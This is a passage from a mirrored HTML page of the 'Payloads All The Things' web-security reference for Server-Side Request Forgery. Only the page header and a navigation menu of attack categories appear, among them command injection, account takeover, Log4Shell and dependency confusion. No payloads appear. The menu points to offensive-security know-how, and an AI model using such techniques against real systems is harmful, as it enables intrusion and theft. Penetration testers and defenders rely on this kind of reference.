weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
76f281cc930ba9049164f4e57bc50400bb693af1
PayloadsAllTheThings/Server Side Request Forgery/index.html

7613 lines
260 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Request%20Forgery/">
<link rel="prev" href="../Server%20Side%20Include%20Injection/">
<link rel="next" href="../Server%20Side%20Template%20Injection/">
<link rel="icon" href="../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.5.15">
<title>Server-Side Request Forgery - Payloads All The Things</title>
<link rel="stylesheet" href="../assets/stylesheets/main.7e359304.min.css">
<link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../custom.css">
<script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#server-side-request-forgery" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href=".." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12c0-2.42-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
</form>
<script>var media,input,key,value,palette=__md_get("__palette");if(palette&&palette.color){"(prefers-color-scheme)"===palette.color.media&&(media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']"),palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent"));for([key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
</button>
</nav>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href=".." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href=".." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key Leaks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
AWS Amazon Bucket S3
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
AWS Amazon Bucket S3
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../AWS%20Amazon%20Bucket%20S3/" class="md-nav__link">
<span class="md-ellipsis">
Amazon Bucket S3 AWS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Argument Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Argument Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Argument%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Argument Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CICD
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CICD
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CICD/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
CSRF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
CSRF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSRF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking: Web Application Security Vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
Dom Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Dom Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dom%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
Dom Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
